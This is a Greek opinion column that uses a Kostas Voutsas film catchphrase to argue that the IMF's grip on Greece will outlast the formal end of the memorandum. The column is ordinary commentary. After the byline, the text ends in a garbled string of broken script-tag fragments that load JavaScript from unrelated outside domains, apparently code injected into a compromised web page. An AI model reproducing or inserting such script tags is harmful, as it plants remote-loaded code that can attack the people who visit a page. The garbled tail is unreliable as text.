Άμα «τρουπώσει τρούπωσε» το ΔΝΤ

voytsas

Είμαι λάτρης του παλιού καλού Ελληνικού σινεμά και το δηλώνω ευθαρσώς και χωρίς ενδοιασμούς και ας μη με πείτε κουλτουριάρη ποτέ. Μπορεί η πλειονότητα των ταινιών να μην μπήκαν ποτέ στο παλμαρέ των αριστουργημάτων τις έβδομης τέχνης και έτσι να μην χαρακτηρίστηκαν ποτέ κουλτουριάρικες, έκρυβαν όμως στις ατάκες τους όλη τη λαϊκή σοφία και ίσως γι’ αυτό αγαπήθηκαν τόσο και συνεχίζουν να αγαπιούνται ακόμη και σήμερα.

Γράφει ο Γιάννης Δραπανιώτης*

Ατάκες μοναδικές, χαραγμένες ανεξίτηλα στη μνήμη όλων μας. Ατάκες που έχουν πιστή εφαρμογή σε όλες της εκφάνσεις της ζωής μας, πολιτικής, κοινωνικής κλπ.

Σίγουρα όλοι θα θυμάστε την ατάκα του Κώστα Βουτσά «είναι να μην τρουπώσω (τρυπώσω) άμα τρουπώσω τρούπωσα». Αυτό μου ήρθε αμέσως στο μυαλό, όταν διάβαζα τις ειδήσεις για τη συνάντηση Χαρδούβελη – Λαγκάρντ και τους πανηγυρισμούς της Ελληνικής Κυβέρνησης για βήματα εξόδου απ’ τη μνημόνιο. Είναι να μην τρουπώσει, δηλαδή να βάλει μια χώρα στο χέρι στο ΔΝΤ, άμα τη βάλει την έβαλε και καλά και άντε να ξεμπλέξει ύστερα.

Το μόνο σίγουρο είναι ότι το τέλος του Μνημονίου, θα έρθει, όχι όμως κατ’ ουσία, αλλά κατ’ όνομα. Δηλαδή δεν θα λέγεται μνημόνιο, διότι η λέξη δεν είναι εύηχη πλέον στ’ αυτιά τον Ελλήνων, άρα είναι αντιεπικοινωνίακη.

Τώρα πως θα λέγεται, άγνωστο μέχρι στιγμής. Το γεγονός είναι ότι δεν θα σταματήσει, διότι αυτό συμπεραίνεται απόλυτα από τα συμφραζόμενα του ΔΝΤ. «Εφαρμόστε το πρόγραμμα και βλέπουμε», δηλαδή συνεχίστε την ολική καταστροφή και την πλήρη αφαίμαξη των πολιτών και θα ΘΑ δούμε αν τελικά θα σας αφήσουμε να βγείτε ή όχι. Προληπτική βοήθεια, ή αλλιώς ανοιχτή πιστωτική γραμμή με τον Ευρωπαϊκό μηχανισμό στήριξης, ώστε να δανειζόμαστε το 2015 και 2016 όποτε χρειαστούμε. Το πότε θα χρειαστούμε, ποιος το καθορίζει; Οι αγορές φυσικά. Δηλαδή οι κερδοσκόποι, τα κεφάλαια «γύπες, τα διεθνή founts κλπ. Άρα «τα ίδια Παντελάκη μου τα ίδια Παντελή μου».

Το Μαξίμου βέβαια πανηγυρίζει. Εδώ, θα μου πείτε πανηγύριζε που πήρε ψήφο εμπιστοσύνης και έβαλε τη χώρα σε μια ασύμφορη μακρά προεκλογική περίοδο. Πανηγύριζε δηλαδή την πολιτική ανευθυνότητα σε όλο της το μεγαλείο!!!

Τελικά όπως προείπαμε είναι να μην τρουπώσει το ΔΝΤ άμα τρουπώσει, τρούπωσε και σου κάθεται στο σβέρκο για τα καλά!!!

ΓΙΑΝΝΗΣ ΔΡΑΠΑΝΙΩΤΗΣ am

Γιάννης Δραπανιώτης

Δημοσιογράφος – Συντάκτης http://www.4news.gr/

 ___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >